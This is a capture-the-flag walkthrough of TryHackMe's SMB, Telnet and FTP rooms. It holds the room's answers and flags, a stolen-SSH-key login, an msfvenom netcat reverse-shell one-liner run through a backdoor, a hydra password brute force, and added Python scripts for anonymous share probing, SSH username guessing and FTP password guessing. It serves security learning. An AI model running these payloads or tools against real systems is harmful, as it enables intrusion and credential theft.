I have been indecisive about choosing between TryHackMe and Hack The Box Academy. Both are great platforms for learning about cybersecurity, and I plan to use both. However, I think TryHackMe is more suitable for absolute beginners like me. While exploring their Network Services rooms, I found myself learning a lot, so I decided to make a post about them.
SMB (Server Message Block) Protocol
Understanding SMB
What does SMB stand for?
Server Message Block
What type of protocol is SMB?
response-request
What do clients connect to servers using?
TCP/IP
What systems does Samba run on?
Unix
Enumerating SMB
Conduct an nmap scan of your choosing. How many ports are open?
3
root@ip-10-10-210-52:~# nmap 10.10.190.95

Starting Nmap 7.60 ( https://nmap.org ) at 2024-06-24 05:55 BST
Nmap scan report for ip-10-10-190-95.eu-west-1.compute.internal (10.10.190.95)
Host is up (0.00047s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 02:58:19:9C:D2:BD (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.76 seconds
What port is SMB running on?
139/445
root@ip-10-10-210-52:~# nmap -sV 10.10.190.95

Starting Nmap 7.60 ( https://nmap.org ) at 2024-06-24 05:57 BST
Nmap scan report for ip-10-10-190-95.eu-west-1.compute.internal (10.10.190.95)
Host is up (0.00042s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 02:58:19:9C:D2:BD (Unknown)
Service Info: Host: POLOSMB; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.04 seconds
Let’s get started with Enum4Linux and conduct a full basic enumeration. For starters, what is the workgroup name?
WORKGROUP
root@ip-10-10-210-52:~# enum4linux -a 10.10.190.95
 Server Comment
 --------- -------

 Workgroup Master
 --------- -------
 WORKGROUP POLOSMB
What comes up as the name of the machine?
POLOSMB
 Server Comment
 --------- -------

 Workgroup Master
 --------- -------
 WORKGROUP POLOSMB
What operating system version is running?
6.1
 ======================================
| OS information on 10.10.190.95 |
 ======================================
Use of uninitialized value $os_info in concatenation (.) or string at /root/Desktop/Tools/Miscellaneous/enum4linux.pl line 464.
[+] Got OS info for 10.10.190.95 from smbclient:
[+] Got OS info for 10.10.190.95 from srvinfo:
 POLOSMB Wk Sv PrQ Unx NT SNT polosmb server (Samba, Ubuntu)
 platform_id : 500
 os version : 6.1
 server type : 0x809a03
What share sticks out as something we might want to investigate?
profiles
 =========================================
| Share Enumeration on 10.10.190.95 |
 =========================================
WARNING: The "syslog" option is deprecated

 Sharename Type Comment
 --------- ---- -------
 netlogon Disk Network Logon Service
 profiles Disk Users profiles
 print$ Disk Printer Drivers
 IPC$ IPC IPC Service (polosmb server (Samba, Ubuntu))
Exploiting SMB
What would be the correct syntax to access an SMB share called “secret” as user “suit” on a machine with the IP 10.10.10.2 on the default port?
smbclient //10.10.10.2/secret -U suit -p 445
We can remotely access the SMB share using the syntax:
smbclient //[IP]/[SHARE]
followed by the tags:
-U [name]: to specify the user
-p [port]: to specify the port
SMB default ports are 139 or 445
Let’s see if our interesting share has been configured to allow anonymous access, i.e. it doesn’t require authentication to view the files. We can do this easily by:
- using the username “Anonymous”
- connecting to the share we found during the enumeration stage
- and not supplying a password.
Does the share allow anonymous access? Y/N?
Y
root@ip-10-10-210-52:~# smbclient //10.10.190.95/profiles -U Anonymous
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\Anonymous's password:
Try "help" to get a list of possible commands.
smb: \>
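Checking one share by hand is fine for a room with four of them; against a real file server it pays to script the null-session test. The script below is an added example (not part of the room or its author's notes): it parses the share table enum4linux printed above (copied in as a constructed sample), keeps the Disk shares worth looking at, and probes each one with smbclient using -N (send an empty password, never prompt) as user Anonymous, exactly the check described in the three steps. The host 10.10.190.95 is the room's target; the probing part needs smbclient installed and a reachable target, while the parsing and classification run offline.

```python
import re
import subprocess
import sys
from typing import List, Tuple

# Constructed sample input: the share table enum4linux printed for 10.10.190.95 above.
SAMPLE_LISTING = """
        Sharename       Type      Comment
        ---------       ----      -------
        netlogon        Disk      Network Logon Service
        profiles        Disk      Users profiles
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (polosmb server (Samba, Ubuntu))
"""

# One table row: share name, share type, free-text comment.
_ROW = re.compile(r"^\s*(\S+)\s+(Disk|IPC|Printer|Device)\b\s*(.*)$")


def parse_shares(listing: str) -> List[Tuple[str, str, str]]:
    """Return (name, type, comment) for each share row of an smbclient -L / enum4linux table."""
    shares = []
    for line in listing.splitlines():
        m = _ROW.match(line)
        if m:
            shares.append((m.group(1), m.group(2), m.group(3).strip()))
    return shares


def interesting_shares(shares: List[Tuple[str, str, str]]) -> List[str]:
    """Disk shares only: IPC$ carries named pipes rather than files, and print$ is the
    printer-driver share Samba creates by default, so neither is worth a first look."""
    return [name for name, stype, _ in shares if stype == "Disk" and name != "print$"]


def probe_command(host: str, share: str) -> List[str]:
    """smbclient with -N (no password prompt, empty password sent) as user Anonymous,
    running a single 'ls' so the call returns instead of dropping into the smb: \\> shell."""
    return ["smbclient", "-N", "-U", "Anonymous", f"//{host}/{share}", "-c", "ls"]


def classify(output: str, returncode: int) -> str:
    """Interpret one probe. Samba reports a refused null session with an NT_STATUS code;
    a zero exit together with a directory listing means the share is readable without credentials."""
    if "NT_STATUS_ACCESS_DENIED" in output or "NT_STATUS_LOGON_FAILURE" in output:
        return "denied"
    if returncode == 0:
        return "anonymous-readable"
    return "error"


def probe(host: str, share: str) -> str:
    """Run the probe against a live host and classify the result."""
    proc = subprocess.run(probe_command(host, share), capture_output=True, text=True, timeout=30)
    return classify(proc.stdout + proc.stderr, proc.returncode)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "10.10.190.95"
    for share in interesting_shares(parse_shares(SAMPLE_LISTING)):
        print(f"{share:<12} {probe(target, share)}")
```

In a real engagement you would feed the output of `smbclient -N -L //target` into parse_shares instead of the pasted sample, and any share that comes back "anonymous-readable" gets the same manual look the profiles share gets below.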
Great! Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to?
John Cactus
smb: \> more "Working From Home Information.txt"
John Cactus,

As you're well aware, due to the current pandemic most of POLO inc. has insisted that, wherever
possible, employees should work from home. As such- your account has now been enabled with ssh
access to the main server.

If there are any problems, please contact the IT department at it@polointernalcoms.uk

Regards,

James
Department Manager

/tmp/smbmore.aObMlQ (END)
What service has been configured to allow him to work from home?
ssh
Okay! Now we know this, what directory on the share should we look in?
.ssh
This directory contains authentication keys that allow a user to authenticate themselves on, and then access, a server. Which of these keys is most useful to us?
id_rsa
smb: \> cd .ssh
smb: \.ssh\> ls
 . D 0 Tue Apr 21 12:08:23 2020
 .. D 0 Tue Apr 21 12:08:23 2020
 id_rsa A 1679 Tue Apr 21 12:08:23 2020
 id_rsa.pub N 396 Tue Apr 21 12:08:23 2020
 authorized_keys N 0 Tue Apr 21 12:08:23 2020

 12316808 blocks of size 1024. 7583712 blocks available
Download this file to your local machine, and change the permissions to “600” using “chmod 600 [file]”.
Now, use the information you have already gathered to work out the username of the account. Then, use the service and key to log-in to the server.
What is the smb.txt flag?
THM{smb_is_fun_eh?}
smb: \.ssh\> get id_rsa
getting file \.ssh\id_rsa of size 1679 as id_rsa (819.8 KiloBytes/sec) (average 819.8 KiloBytes/sec)
smb: \.ssh\> exit
root@ip-10-10-51-158:~# chmod 600 id_rsa
root@ip-10-10-51-158:~# ssh root@10.10.190.95 -i id_rsa
root@10.10.190.95's password:

root@ip-10-10-51-158:~# ssh johncactus@10.10.190.95 -i id_rsa
Connection closed by 10.10.190.95 port 22
root@ip-10-10-51-158:~# ssh JohnCactus@10.10.190.95 -i id_rsa
Connection closed by 10.10.190.95 port 22
root@ip-10-10-51-158:~# ssh cactus@10.10.190.95 -i id_rsa
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-96-generic x86_64)

 * Documentation: https://help.ubuntu.com
 * Management: https://landscape.canonical.com
 * Support: https://ubuntu.com/advantage

 System information as of Mon Jun 24 05:55:20 UTC 2024

 System load: 0.0 Processes: 93
 Usage of /: 33.3% of 11.75GB Users logged in: 0
 Memory usage: 17% IP address for eth0: 10.10.190.95
 Swap usage: 0%


22 packages can be updated.
0 updates are security updates.


Last login: Tue Apr 21 11:19:15 2020 from 192.168.1.110
cactus@polosmb:~$ ls
smb.txt
cactus@polosmb:~$ cat smb.txt
THM{smb_is_fun_eh?}
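The username took three wrong guesses above, and the first one (root) hung at a password prompt because ssh falls back to password authentication when the key is rejected. Two things make this step mechanical: the id_rsa.pub next to the private key usually carries a user@host comment that names the owner, and ssh with BatchMode=yes fails instantly instead of prompting. The script below is an added example, not from the room, that builds candidate logins from the "John Cactus" name in the document, reads the public-key comment (the key line used here is constructed, since the real id_rsa.pub was not shown), and tries the recovered key as each user against the room's 10.10.190.95.

```python
import subprocess
from typing import List, Optional, Tuple


def username_candidates(full_name: str) -> List[str]:
    """Login names a Unix admin commonly derives from a "First Last" name, lower-cased,
    de-duplicated and ordered roughly by how often each convention shows up."""
    parts = full_name.lower().split()
    if len(parts) < 2:
        return parts
    first, last = parts[0], parts[-1]
    raw = [
        last,                # cactus
        first,               # john
        first + last,        # johncactus
        first[0] + last,     # jcactus
        first + "." + last,  # john.cactus
        first + "_" + last,  # john_cactus
        last + first[0],     # cactusj
    ]
    ordered: List[str] = []
    for cand in raw:
        if cand not in ordered:
            ordered.append(cand)
    return ordered


def pubkey_comment(pubkey_line: str) -> str:
    """An OpenSSH public key is 'type base64 [comment]'. ssh-keygen fills the comment
    with user@host by default, so id_rsa.pub often names the owner outright."""
    fields = pubkey_line.strip().split(None, 2)
    return fields[2] if len(fields) == 3 else ""


def ssh_key_command(host: str, user: str, key_path: str) -> List[str]:
    """BatchMode=yes makes ssh fail instead of falling back to a password prompt when the
    key is rejected (the root@ attempt above sat at such a prompt); ConnectTimeout keeps
    the loop moving when the server drops the connection outright."""
    return [
        "ssh", "-i", key_path,
        "-o", "BatchMode=yes",
        "-o", "ConnectTimeout=5",
        "-o", "StrictHostKeyChecking=accept-new",
        f"{user}@{host}", "id",
    ]


def find_key_owner(host: str, key_path: str, candidates: List[str]) -> Optional[Tuple[str, str]]:
    """Try the key as each candidate user; return (user, output of id) on the first success."""
    for user in candidates:
        proc = subprocess.run(ssh_key_command(host, user, key_path),
                              capture_output=True, text=True, timeout=30)
        if proc.returncode == 0:
            return user, proc.stdout.strip()
    return None


if __name__ == "__main__":
    # Constructed public-key line standing in for the id_rsa.pub found in the share.
    hint = pubkey_comment("ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDexample cactus@polosmb")
    names = username_candidates("John Cactus")
    if "@" in hint:
        names.insert(0, hint.split("@", 1)[0])  # the comment's user part goes first
    print(find_key_owner("10.10.190.95", "id_rsa", names))
```

Remember the chmod 600 from the previous step: OpenSSH refuses a private key that is group- or world-readable, and with BatchMode that shows up as just another failed attempt.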
Telnet
Understanding Telnet
What is Telnet?
Application Protocol
What has slowly replaced Telnet?
SSH
How would you connect to a Telnet server with the IP 10.10.10.3 on port 23?
telnet 10.10.10.3 23
The lack of what means that all Telnet communication is in plain text?
Encryption
Enumerating Telnet
How many ports are open on the target machine?
1
PORT STATE SERVICE REASON VERSION
8012/tcp open unknown syn-ack ttl 64
What port is this?
8012
This port is unassigned, but still lists the protocol it’s using, what protocol is this?
TCP
Now re-run the nmap scan, without the -p- tag, how many ports show up as open?
0
Based on the title returned to us, what do we think this port could be used for?
a backdoor
PORT STATE SERVICE VERSION
8012/tcp open unknown
| fingerprint-strings:
| DNSStatusRequest, DNSVersionBindReq, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, X11Probe:
|_ SKIDY'S BACKDOOR. Type .HELP to view commands
Who could it belong to? Gathering possible usernames is an important step in enumeration.
Skidy
Exploring Telnet
Great! It’s an open telnet connection! What welcome message do we receive?
SKIDY'S BACKDOOR
root@ip-10-10-46-62:~# telnet 10.10.220.9 8012
Trying 10.10.220.9...
Connected to 10.10.220.9.
Escape character is '^]'.
SKIDY'S BACKDOOR. Type .HELP to view commands
Let’s try executing some commands, do we get a return on any input we enter into that telnet session? (Y/N)
N
Hmm… that’s strange. Let’s check to see if what we’re typing is being executed as a system command.
Start a tcpdump listener on your local machine.
root@ip-10-10-46-62:~# sudo tcpdump ip proto\\icmp -i ens5
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens5, link-type EN10MB (Ethernet), capture size 262144 bytes
Now, use the command ping [local THM ip] -c 1 through the telnet session to see if we’re able to execute system commands. Do we receive any pings? Note, you need to preface this with .RUN (Y/N)
Y
root@ip-10-10-46-62:~# telnet 10.10.220.9 8012
Trying 10.10.220.9...
Connected to 10.10.220.9.
Escape character is '^]'.
SKIDY'S BACKDOOR. Type .HELP to view commands
.RUN ping 10.10.46.62 -c 1
root@ip-10-10-46-62:~# sudo tcpdump ip proto\\icmp -i ens5
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens5, link-type EN10MB (Ethernet), capture size 262144 bytes
03:35:25.225403 IP ec2-13-214-173-166.ap-southeast-1.compute.amazonaws.com > ip-10-10-46-62.eu-west-1.compute.internal: ICMP echo reply, id 16509, seq 14618, length 8
03:36:25.256032 IP ip-10-10-220-9.eu-west-1.compute.internal > ip-10-10-46-62.eu-west-1.compute.internal: ICMP echo request, id 1319, seq 1, length 64
03:36:25.256083 IP ip-10-10-46-62.eu-west-1.compute.internal > ip-10-10-220-9.eu-west-1.compute.internal: ICMP echo reply, id 1319, seq 1, length 64
We’re going to generate a reverse shell payload using msfvenom. This will generate and encode a netcat reverse shell for us. Here’s our syntax:
msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R
-p = payload
lhost = our local host IP address (this is your machine’s IP address)
lport = the port to listen on (this is the port on your machine)
R = export the payload in raw format
What word does the generated payload start with?
mkfifo
root@ip-10-10-46-62:~# msfvenom -p cmd/unix/reverse_netcat lhost=10.10.46.62 lport=4444 R
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 101 bytes
mkfifo /tmp/loqsthl; nc 10.10.46.62 4444 0</tmp/loqsthl | /bin/sh >/tmp/loqsthl 2>&1; rm /tmp/loqsthl
Now all we need to do is start a netcat listener on our local machine. We do this using:
nc -lvp [listening port]
What would the command look like for the listening port we selected in our payload?
nc -lvp 4444
Success!! What is the contents of flag.txt?
THM{y0u_g0t_th3_t3ln3t_fl4g}
root@ip-10-10-46-62:~# telnet 10.10.220.9 8012
Trying 10.10.220.9...
Connected to 10.10.220.9.
Escape character is '^]'.
SKIDY'S BACKDOOR. Type .HELP to view commands
.RUN mkfifo /tmp/loqsthl; nc 10.10.46.62 4444 0</tmp/loqsthl | /bin/sh >/tmp/loqsthl 2>&1; rm /tmp/loqsthl
root@ip-10-10-46-62:~# nc -lvp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from ip-10-10-220-9.eu-west-1.compute.internal 57836 received!
ls
flag.txt
cat flag.txt
THM{y0u_g0t_th3_t3ln3t_fl4g}
FTP (File Transfer Protocol)
Understanding FTP
What communications model does FTP use?
client-server
What’s the standard FTP port?
21
How many modes of FTP connection are there?
2
The FTP server may support either Active or Passive connections, or both.
- In an Active FTP connection, the client opens a port and listens. The server is required to actively connect to it.
- In a Passive FTP connection, the server opens a port and listens (passively) and the client connects to it.
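The two modes differ in one exchange on the control connection, and that exchange is what the "200 PORT command successful. Consider using PASV." lines in the ftp transcripts below are about: the stock ftp client defaulted to active mode, told the server where to connect back with PORT, and the server suggested passive instead. Active mode only works when the server can open a connection to the client, which NAT or inbound filtering on the tester's side will break; passive mode is what you want from a pentest box. The script below is an added example, not from the room, showing both sides of that exchange: decoding a 227 reply into the host and port the client must connect to (p1*256 + p2), building the PORT command a client sends in active mode, and running the same LIST over both modes with ftplib against the room's 10.10.41.45. The 227 reply and the client address 10.10.87.146 used in the demo are constructed.

```python
import ftplib
import re
from typing import List, Tuple

# The (h1,h2,h3,h4,p1,p2) tuple the server puts in its 227 reply.
_PASV = re.compile(r"\((\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\)")


def parse_pasv(reply: str) -> Tuple[str, int]:
    """Passive mode: the server answers PASV with
    '227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)' and the client opens the data
    connection to h1.h2.h3.h4 on port p1*256 + p2."""
    if not reply.startswith("227"):
        raise ValueError(f"not a PASV success reply: {reply!r}")
    m = _PASV.search(reply)
    if m is None:
        raise ValueError(f"no (h1,h2,h3,h4,p1,p2) tuple in: {reply!r}")
    nums = [int(x) for x in m.groups()]
    if any(n > 255 for n in nums):
        raise ValueError(f"octet out of range in: {reply!r}")
    host = ".".join(str(n) for n in nums[:4])
    return host, nums[4] * 256 + nums[5]


def port_command(client_ip: str, listen_port: int) -> str:
    """Active mode: the client listens on listen_port and sends 'PORT h1,h2,h3,h4,p1,p2'
    so the server connects back to it. The server must be able to reach the client."""
    if not 0 < listen_port < 65536:
        raise ValueError("port out of range")
    octets = client_ip.split(".")
    if len(octets) != 4 or not all(o.isdigit() and int(o) < 256 for o in octets):
        raise ValueError(f"not an IPv4 address: {client_ip!r}")
    return f"PORT {','.join(octets)},{listen_port // 256},{listen_port % 256}\r\n"


def list_directory(host: str, user: str, password: str, passive: bool = True) -> List[str]:
    """The same LIST over either mode; ftplib switches modes with set_pasv()."""
    lines: List[str] = []
    with ftplib.FTP() as ftp:
        ftp.connect(host, 21, timeout=10)
        ftp.login(user, password)
        ftp.set_pasv(passive)
        ftp.retrlines("LIST", lines.append)
    return lines


if __name__ == "__main__":
    host, port = parse_pasv("227 Entering Passive Mode (10,10,41,45,195,80)")  # constructed reply
    print("passive: client connects to", host, port)
    print("active: client sends", port_command("10.10.87.146", 50000).strip())
    for passive in (True, False):
        label = "passive" if passive else "active"
        try:
            print(label, list_directory("10.10.41.45", "anonymous", "", passive))
        except OSError as exc:
            print(label, "failed:", exc)
```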
Enumerating FTP
Run an nmap scan of your choice.
How many ports are open on the target machine?
2
What port is ftp running on?
21
What variant of FTP is running on it?
vsftpd
Great, now we know what type of FTP server we’re dealing with we can check to see if we are able to login anonymously to the FTP server. We can do this by typing ftp [IP] into the console, and entering “anonymous”, and no password when prompted.
What is the name of the file in the anonymous FTP directory?
PUBLIC_NOTICE.txt
root@ip-10-10-87-146:~# ftp 10.10.41.45
Connected to 10.10.41.45.
220 Welcome to the administrator FTP service.
Name (10.10.41.45:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 353 Apr 24 2020 PUBLIC_NOTICE.txt
226 Directory send OK.
ftp>
What do we think a possible username could be?
Mike
ftp> get PUBLIC_NOTICE.txt
local: PUBLIC_NOTICE.txt remote: PUBLIC_NOTICE.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for PUBLIC_NOTICE.txt (353 bytes).
226 Transfer complete.
353 bytes received in 0.00 secs (226.4958 kB/s)
ftp> bye
221 Goodbye.
root@ip-10-10-87-146:~# ls
burp.json Desktop Instructions Postman Rooms thinclient_drives
CTFBuilder Downloads Pictures PUBLIC_NOTICE.txt Scripts Tools
root@ip-10-10-87-146:~# cat PUBLIC_NOTICE.txt
===================================
MESSAGE FROM SYSTEM ADMINISTRATORS
===================================

Hello,

I hope everyone is aware that the
FTP server will not be available
over the weekend- we will be
carrying out routine system
maintenance. Backups will be
made to my account so I reccomend
encrypting any sensitive data.

Cheers,

Mike
Exploiting FTP
What is the password for user “mike”?
password
root@ip-10-10-87-146:~# hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt -vV 10.10.41.45 ftp
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2024-06-25 04:40:47
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344398 login tries (l:1/p:14344398), ~3586100 tries per task
[DATA] attacking ftp://10.10.41.45:21/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[ATTEMPT] target 10.10.41.45 - login "mike" - pass "123456" - 1 of 14344398 [child 0] (0/0)
[ATTEMPT] target 10.10.41.45 - login "mike" - pass "12345" - 2 of 14344398 [child 1] (0/0)
[ATTEMPT] target 10.10.41.45 - login "mike" - pass "123456789" - 3 of 14344398 [child 2] (0/0)
[ATTEMPT] target 10.10.41.45 - login "mike" - pass "password" - 4 of 14344398 [child 3] (0/0)
[21][ftp] host: 10.10.41.45 login: mike password: password
[STATUS] attack finished for 10.10.41.45 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2024-06-25 04:41:03
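Hydra found the password on the fourth try because rockyou.txt is ordered by frequency and "password" sits near the top. It is worth seeing what the tool does under the hood, so here is an added example (not from the room or from hydra) of the same single-user guessing loop written with Python's ftplib: one fresh control connection per guess, a 530 reply counted as a miss, stop at the first 230, with an optional delay and attempt cap for targets that lock accounts. The login function is passed in as a parameter, so the loop itself can be exercised offline with a fake; the constructed SAMPLE_WORDS are the four passwords hydra tried above plus one more, and the live run targets the room's 10.10.41.45.

```python
import ftplib
import sys
import time
from typing import Callable, Iterable, Iterator, Optional, Tuple


def ftp_login_ok(host: str, user: str, password: str, port: int = 21, timeout: float = 10.0) -> bool:
    """One authentication attempt on a fresh control connection. vsftpd kills the session
    after max_login_fails (default 3) wrong passwords, so reconnecting per guess is the
    robust choice and is what hydra does too. True only when the server answers 230."""
    try:
        with ftplib.FTP() as ftp:
            ftp.connect(host, port, timeout=timeout)
            ftp.login(user, password)
            return True
    except ftplib.error_perm:  # 530 Login incorrect
        return False


def read_wordlist(path: str) -> Iterator[str]:
    """rockyou.txt contains bytes that are not valid UTF-8; latin-1 decodes every byte
    without raising, and blank lines are skipped."""
    with open(path, encoding="latin-1") as fh:
        for line in fh:
            word = line.rstrip("\r\n")
            if word:
                yield word


def guess_password(user: str, candidates: Iterable[str],
                   attempt: Callable[[str, str], bool],
                   delay: float = 0.0,
                   max_attempts: Optional[int] = None) -> Tuple[Optional[str], int]:
    """Try candidates in order and stop at the first success. Returns (password, tries).
    `attempt` is the login function, injected so the loop can run without a server;
    `delay` throttles the loop and `max_attempts` caps it when a lockout policy applies."""
    tries = 0
    for pw in candidates:
        if max_attempts is not None and tries >= max_attempts:
            break
        tries += 1
        if attempt(user, pw):
            return pw, tries
        if delay:
            time.sleep(delay)
    return None, tries


# Constructed candidate list: the four guesses hydra made above, plus one more.
SAMPLE_WORDS = ["123456", "12345", "123456789", "password", "iloveyou"]


if __name__ == "__main__":
    host = sys.argv[1] if len(sys.argv) > 1 else "10.10.41.45"
    words = read_wordlist(sys.argv[2]) if len(sys.argv) > 2 else SAMPLE_WORDS
    found, n = guess_password("mike", words,
                              lambda u, p: ftp_login_ok(host, u, p), delay=0.2)
    print(f"password: {found!r} after {n} attempts")
```

The order of the wordlist does all the work here; against a target with an account-lockout policy, max_attempts and delay matter more than speed, and hydra's -t 4 parallelism is exactly the kind of thing you would turn down.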
What is ftp.txt?
THM{y0u_g0t_th3_ftp_fl4g}
root@ip-10-10-87-146:~# ftp 10.10.41.45
Connected to 10.10.41.45.
220 Welcome to the administrator FTP service.
Name (10.10.41.45:root): mike
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx 2 0 0 4096 Apr 24 2020 ftp
-rwxrwxrwx 1 0 0 26 Apr 24 2020 ftp.txt
226 Directory send OK.
ftp> get ftp.txt
local: ftp.txt remote: ftp.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for ftp.txt (26 bytes).
226 Transfer complete.
26 bytes received in 0.00 secs (29.6273 kB/s)
ftp> bye
221 Goodbye.
root@ip-10-10-87-146:~# cat ftp.txt
THM{y0u_g0t_th3_ftp_fl4g}